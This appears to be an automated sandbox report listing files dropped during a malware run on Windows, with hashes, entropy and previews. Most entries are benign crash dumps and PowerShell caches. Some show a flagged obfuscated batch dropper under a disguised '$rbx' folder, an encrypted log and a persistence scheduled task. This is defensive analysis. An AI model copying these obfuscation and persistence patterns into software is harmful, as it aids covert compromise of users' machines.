                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.3.6.3.4.0.2.9.4.3.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.3.6.3.4.8.8.8.8.0.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.4.9.b.b.2.c.-.3.b.3.2.-.4.e.6.5.-.a.a.9.2.-.f.e.1.2.5.6.8.d.b.b.4.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.f.6.8.f.1.8.-.9.9.a.8.-.4.5.a.3.-.a.5.b.d.-.d.2.0.2.3.b.8.0.0.6.7.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.2.c.-.0.0.0.1.-.0.0.1.5.-.6.8.9.e.-.3.b.4.8.9.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AC3.tmp.dmp

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Mini DuMP crash report, 15 streams, Thu Oct 3 12:53:54 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):916769
                                        Entropy (8bit):3.4582296911583743
                                        Encrypted:false
                                        SSDEEP:24576:t8QCnkLu4EnZgfWLPHwyTjbqseyQSzgl:t8QCnkC4EnZgfWzHwIi9sgl
                                        MD5:EED7AEE7939B8A624D764CE0FDFA7896
                                        SHA1:6FCCEAB8C32BC53962AD34DC244F9A5C77E58198
                                        SHA-256:A30FBFA8BA50A3D88CA477AD33B6E62BCBA28B820FAF02E7929728A51B4BDB60
                                        SHA-512:C0425AE5A8AE7BBB55C6C1002A62331BA75E2EBC85D2B0DBCFEDA40F4C4F57E6BC94BE8A22067863D0F02E6AB32779877E879CC3C40E48E0085A353CF9FF913F
                                        Malicious:false
                                        Preview:MDMP..a..... .........f............T............'..h........5...3..........D...........`.......8...........T............]..Q............h...........j..............................................................................eJ......<k......Lw......................T.......,.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D74.tmp.WERInternalMetadata.xml

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8780
                                        Entropy (8bit):3.70017372523216
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJyv46YzJwgmfZaPTpWEd89bYODfpIm:R6lXJS46YdwgmfQPgYyfT
                                        MD5:A2F67D33F80638A48FDF2B36CC0DED98
                                        SHA1:7C0697CC35565A382943EDA94835DB071102AE15
                                        SHA-256:D6718ED7E29F921C3631FB301C34AC0721A680A61EB07D9A455BE0BE605EEAB3
                                        SHA-512:C278B6EE38CA436091948CFA16312AF26DF6D3972F5DD5B886C01542CA89ECF558C01FFD32EFCC2CB3D3892B933760E9927208EFB78A207A2142D847F110BEE8
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.4.4.<./.P.i.

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D94.tmp.xml

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4777
                                        Entropy (8bit):4.441804039637695
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zseXgJg771I9PMWpW8VYMYm8M4JQ9wSFmvmyq8vlwgytfeMd:uIjfbI7Al7VYJQGoWugufHd
                                        MD5:883C6BBF4298353A073AD4AC0110C98F
                                        SHA1:C2842AAFCF521F1043B23C2233A27FA905047AE5
                                        SHA-256:582837EE81F402E266AEF0AEB5619DCECBBCC2637AE4368875C1A005C25A3643
                                        SHA-512:2B1056308795C4D66DA019A7E4E1F60916A5DD10A9590FF1DBE95E67C0C41C6D03F623D6DC1850B24030658CAA2111A9FD2BEEB68FE57EFEAD3FE8FA6F027630
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527276" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C9.tmp.dmp

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Mini DuMP crash report, 15 streams, Thu Oct 3 12:54:34 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):904688
                                        Entropy (8bit):3.4881990991517235
                                        Encrypted:false
                                        SSDEEP:24576:7qPVO/6TR9/7Ty+T0GV+C5sfsqjUOqQ0pok:GPVOCTR9/7Ty+T0c+EC/4Ouok
                                        MD5:596AE69B8C49A46838958D012DB559FE
                                        SHA1:ADD49CBFD7D1929976027699BE58876BDB43D797
                                        SHA-256:9F983ADDA08F7531C659BECFEAC0F752B8E57E243501F9418F61DC28379BD581
                                        SHA-512:355325755C40ECD3D59ADCF3705867B7F1919F9CDDF8B0A0D47D28234DC26E001701A307BA713DA75C41D633C1B3AC7EC9015967459CEED4D158B62186FC9E8C
                                        Malicious:false
                                        Preview:MDMP..a..... ..........f............$............'..8........4...2..........|...........`.......8...........T............^...o...........g...........i..............................................................................eJ......Dj......Lw......................T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4A.tmp.WERInternalMetadata.xml

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8780
                                        Entropy (8bit):3.7011872798164305
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJHgy6YIZ8gmfZaPTpWEg89bgH1fSgm:R6lXJAy6Y28gmfQPngVfk
                                        MD5:6D9E3486A8233E1E83E6A7C9D258B3F1
                                        SHA1:991B46BB82299D3AA243FFE8D9E5E246403FD51F
                                        SHA-256:DCF4E5E5C46159D8AE17A097AF458DCE9A062A7CB40A6693E756A397A9A358E7
                                        SHA-512:DF5B1F45F71C34072ABE0C17CE3B367224E20DDADEDFD1ECB9AD1BE08635B5713F989B4EC4FD657D03831094D1BB2FEAAEF1AF4BEDB7F19ECDA27E8938C24C56
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB99.tmp.xml

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4777
                                        Entropy (8bit):4.439949775834441
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zseXPJg771I9PMWpW8VYIPYm8M4JQ9wSFAmyq8vlwl5ytfjd:uIjfgI7Al7VdSJQGBmWujufjd
                                        MD5:309127845078F3E197EDF7FEDA3D9293
                                        SHA1:BF12E5A090E1F8EC732B1BD3B2A625996EB67D37
                                        SHA-256:054DE9739F4B0A9A517AFB0897E924BE765D0EB178B71AF0F5F2A03B185CC6AD
                                        SHA-512:F7E1978F17EB5770F7D4C6B555698324D424FC11ED8A490A7A9374C69D399516E76F5ED8C97AF653C9BCAA8F885D7693339E47D3672526DD49D4A05D3BE07558
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527277" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):9713
                                        Entropy (8bit):4.940954773740904
                                        Encrypted:false
                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                        MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                        SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                        SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                        SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                        Malicious:false
                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2916
                                        Entropy (8bit):5.3871960512613635
                                        Encrypted:false
                                        SSDEEP:48:4HAzsSU4y4RQmFoUeCamfm9qr9t5/78NfpHcRDGxJaGaxIZVEouNHJBVrH/jCB:8AzlHyIFKL2O9qrh7KfpRJlPEo2dL8
                                        MD5:631C3C75A8C0F4DBD37FB862C5396E4B
                                        SHA1:DE2A4AB1FA3127D61C2BA0DEB121824A40FBA37C
                                        SHA-256:3CE6D383C9857E94AEF34DB81F846806DB9A8AF34B462DABA9A0464CCE6E30EA
                                        SHA-512:4BD4A403BA45DE3E1AD0A2DEF4C5643E547DFC2013591529B2102C5DE091D33F8335BCF95CE16264E0BB3C510BD3B32584FB152569B6432DB910220D15AE1E76
                                        Malicious:false
                                        Preview:@...e.................................|.........................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_irdpucxf.phs.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnahg3ri.r0k.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kd2ni2a4.5dl.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbml4rjv.f1d.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qn4tvc0r.mwb.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlzolohb.yjl.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Roaming\$nya-Logs\2024-10-03

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):416
                                        Entropy (8bit):7.500203693210278
                                        Encrypted:false
                                        SSDEEP:12:MoCe21fsfY9Zk84pnSS16mxXhMfXWQqhjoqw01s//e3H:MoCXsgk84Ahq6WQqHw0t
                                        MD5:F4202432DA421942ECEAA113C3365647
                                        SHA1:583FB67FF1B5308DE144BBB598675162DC0C4A1F
                                        SHA-256:202C586C6424B65FD143967C64DA5CDC9B0539C6F44E4B35998652A050ED4069
                                        SHA-512:691D3AB43EB03B3D25E07F87FEE7DA5F9DEEF1DBB061C9F7E29AA3FFBC0710BB55B3F8DAE22E602EFD678B2560E2E4D41406200F9417FFFADFB4B1F670373440
                                        Malicious:false
                                        Preview:U.!.3.(..g..jU..T...t^K.....{.W.Wy.`..g.4;...T..............&_R...h{.Y.<..W..NUz.r.l.W.w.RF....7..UH.D..0>v8...).y...].....D.6J{..'`1?M)N..A...*O..^.f..v..up.p..j.#YvKB....m.u+E..p.......,.M;.....xq..\.xp.o....WBg...'..7.IpcL..M......5u..f.~bE.M..u@g..{....w.!8.....qZ`J<6..>..@..n.....PT.l.......}..Zp03[....J..fM.5.2O...F.".w.......>C..E..|.I.[....(.Q.T...5.|.....02...O...g...7..[...`Q.U..'.

                                        C:\Windows\$rbx-onimai2\$rbx-CO2.bat

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (5674), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):5214429
                                        Entropy (8bit):6.008704485108026
                                        Encrypted:false
                                        SSDEEP:49152:BYFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:r
                                        MD5:D1324A085A54C035D136F7A73EDEC440
                                        SHA1:3049E422F937395D1D64E205CE5978182D3C2388
                                        SHA-256:6A25D0CA74A29596A0C09F26ACBE9F85A46D5C1C886A6860DC915D94FFBBBE5A
                                        SHA-512:0D43B7711A86A6C04DDA27555037DC5E459A5AAD4FE719E0D03B2D37CF3B8274E9A0417D089135E9ABC3D6232F2BF7264781B5A8B7988058C13BC0C794027CBC
                                        Malicious:true
                                        Preview:Aecho off..%^%A%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJqyhiYGVWNKJRrYodYeEjAsbrOpYYCWmpWWBUAVhPcsRZmXzGSNYAyIjYxQuJIWtQytUuwtCdXPgiBbfQPsgPYLQoND%%^%c%KAygfZaASdfjylUCJBawwLDTqQERMDGGSXRCzJbjAAmNKiHDdjhNMhaZXEPovjOowyrBurdazRWVyQjijaODwTTLWSFVTMOrMXrlRgiLfhnVkfAguHfuukSCEFECMihNdFjAzXrcScyoGYARryAlGtWBeOHlCGZWZzSF%%^%h%aHwqdBsMDWGeNlnHVgJJHvLqgAmcBpgfVUrReUDSDPARbgOvMpdsjVoEWgkCpqloPAjSTwDbCRfSUToZMRqmlOWZFNUYKaCnDmcBXVBqMcPrQwJdRkQyaZdbDjmgBEqBoSoIRNcQpZAiYEjjeRhzkdnEiaYNIuPhLndYialehajazVdYZdcKxRrlEJAQPohUkswKBlbdFcrjUmfm%%^%o%ZOFseJUWRtyzvoSSoPgytwOcYeuzhqsDnTPACCfIBNJRCEkNyqGwZODCZDtaouOBaVlBzsqLKxWFMWAuUGaQKVEzpmAYjfuhZiRHsIogaUMBRYQddYfIuXRfqMmmRrCEdPFEfSclsUQPjcIrwxVkZLNcrLqFwcoIshybslYkWUpzgcVodVQuvsFrcDntCwPqFixbDHYkzLnfvnWpPb%%^% %BmUmZChYPYEHAeZTXEULwWFVKezVPHYDAUndLWxzwIilUdNawt

                                        C:\Windows\$rbx-onimai2\$rbx-CO2.bat:Zone.Identifier

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Windows\System32\Tasks\$rbx-FHOIapsb

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3488
                                        Entropy (8bit):3.5852570413238927
                                        Encrypted:false
                                        SSDEEP:48:yei1q97CQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXCc0:txnkp2Gdi3ipVA9ll7EhAMz3cHtr+
                                        MD5:FF7FADBC1F6F70260480D0DEB8DE497A
                                        SHA1:61BD94D4B9E4C4AE140FC34AA3E070E8FD1DE20F
                                        SHA-256:DB8859332F0AAE996F50E8B888F898C08C1B68DAEBB086C99C4540306D2BA811
                                        SHA-512:DB7FB886AACE4F7F1460B1E933C48276BDB29DF1BCFC90884A55F516A5929213131F4B1F6F105E4740C02745349B615EB5EEFE08D107F3F7765094DC0567FD80
                                        Malicious:false
